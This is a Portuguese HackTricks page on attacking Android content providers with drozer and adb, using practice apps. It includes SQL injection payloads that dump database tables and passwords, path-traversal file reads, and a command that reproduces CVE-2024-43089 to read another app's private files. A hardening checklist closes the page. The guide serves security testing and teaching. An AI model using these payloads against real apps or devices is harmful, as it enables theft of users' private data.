Exploiting Content Providers

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Intro

Os dados são fornecidos de um aplicativo para outros mediante solicitação por um componente conhecido como content provider. Essas solicitações são gerenciadas através dos métodos da ContentResolver class. Os content providers podem armazenar seus dados em vários locais, como um banco de dados, arquivos ou através de uma rede.

No arquivo Manifest.xml, a declaração do content provider é necessária. Por exemplo:

xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

Para acessar content://com.mwr.example.sieve.DBContentProvider/Keys, a permissão READ_KEYS é necessária. É interessante notar que o caminho /Keys/ é acessível na seção seguinte, que não está protegida devido a um erro do desenvolvedor, que protegeu /Keys mas declarou /Keys/.

Talvez você possa acessar dados privados ou explorar alguma vulnerabilidade (SQL Injection ou Path Traversal).

Obter informações de provedores de conteúdo expostos

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

É possível juntar como acessar o DBContentProvider começando URIs com “content://”. Essa abordagem é baseada em insights obtidos ao usar o Drozer, onde informações chave estavam localizadas no diretório /Keys.

Drozer pode adivinhar e tentar várias URIs:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

Você também deve verificar o código do ContentProvider para procurar por consultas:

Além disso, se você não conseguir encontrar consultas completas, pode verificar quais nomes são declarados pelo ContentProvider no método onCreate:

A consulta será como: content://name.of.package.class/declared_name

Content Providers baseados em Banco de Dados

Provavelmente, a maioria dos Content Providers é usada como interface para um banco de dados. Portanto, se você puder acessá-lo, poderá extrair, atualizar, inserir e deletar informações.
Verifique se você pode acessar informações sensíveis ou tente alterá-las para contornar mecanismos de autorização.

Ao verificar o código do Content Provider, procure também por funções nomeadas como: query, insert, update e delete:

Porque você poderá chamá-las

Consultar conteúdo

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

Inserir conteúdo

Consultando o banco de dados, você aprenderá o nome das colunas, então, você poderá inserir dados no DB:

Observe que em insert e update você pode usar --string para indicar string, --double para indicar um double, --float, --integer, --long, --short, --boolean

Atualizar conteúdo

Sabendo o nome das colunas, você também pode modificar as entradas:

Deletar conteúdo

SQL Injection

É simples testar para SQL injection (SQLite) manipulando os campos de projeção e seleção que são passados para o content provider.
Ao consultar o Content Provider, há 2 argumentos interessantes para buscar informações: --selection e --projection:

Você pode tentar abusar desses parâmetros para testar por SQL injections:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |

Descoberta automática de SQL Injection pelo Drozer

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

Provedores de Conteúdo Baseados em Sistema de Arquivos

Os provedores de conteúdo também podem ser usados para acessar arquivos:

Ler arquivo

Você pode ler arquivos do Provedor de Conteúdo

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Path Traversal

Se você pode acessar arquivos, pode tentar abusar de um Path Traversal (neste caso, isso não é necessário, mas você pode tentar usar "../" e truques semelhantes).

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Descoberta automática de Path Traversal pelo Drozer

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

2023-2025 Atualizações & Dicas Modernas

Drozer 3.x (Python 3) está disponível

A WithSecure retomou a manutenção do drozer em 2022 e portou o framework para Python 3 (último 3.1.0 – Abril de 2024). Além de correções de compatibilidade, novos módulos que são particularmente úteis ao trabalhar com Content Providers incluem:

  • scanner.provider.exported – lista apenas provedores com android:exported="true".
  • app.provider.grant – chama automaticamente grantUriPermission() para que você possa se comunicar com provedores que esperam FLAG_GRANT_READ_URI_PERMISSION / FLAG_GRANT_WRITE_URI_PERMISSION no Android 12+.
  • Melhor manuseio de Scoped Storage para que provedores baseados em arquivos no Android 11+ ainda possam ser acessados.

Atualize (host & agente):

bash
pipx install --force "git+https://github.com/WithSecureLabs/drozer@v3.1.0"
adb install drozer-agent-3.1.0.apk

Usando o helper cmd content embutido (ADB ≥ 8.0)

Todos os dispositivos Android modernos vêm com um CLI que pode consultar/atualizar provedores sem instalar nenhum agente:

bash
adb shell cmd content query  --uri content://com.test.provider/items/
adb shell cmd content update --uri content://com.test.provider/items/1 \
--bind price:d:1337
adb shell cmd content call   --uri content://com.test.provider  \
--method evilMethod --arg 'foo'

Combine com run-as <pkg> ou um shell com root para testar provedores apenas internos.

CVEs recentes do mundo real que abusaram de Provedores de Conteúdo

CVEAnoComponenteClasse de bugImpacto
CVE-2024-430892024MediaProviderTraversal de caminho em openFile()Leitura de arquivo arbitrário do armazenamento privado de qualquer app
CVE-2023-356702023MediaProviderTraversal de caminhoDivulgação de informações

Recrie CVE-2024-43089 em uma build vulnerável:

bash
adb shell cmd content read \
--uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml

Lista de verificação de hardening para API 30+

  • Declare android:exported="false" a menos que o provedor deva ser público – a partir da API 31, o atributo é obrigatório.
  • Aplique permissões e/ou android:grantUriPermissions="true" em vez de exportar todo o provedor.
  • Liste os argumentos permitidos de projection, selection e sortOrder (por exemplo, construa consultas com SQLiteQueryBuilder.setProjectionMap).
  • No openFile(), canonicize o caminho solicitado (FileUtils) e rejeite sequências .. para evitar travessia.
  • Ao expor arquivos, prefira Storage Access Framework ou um FileProvider.

Essas mudanças nas versões recentes do Android significam que muitos primitivos de exploração legados ainda funcionam, mas requerem flags/permissões adicionais que os módulos drozer atualizados ou o helper cmd content podem aplicar automaticamente.

Referências

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks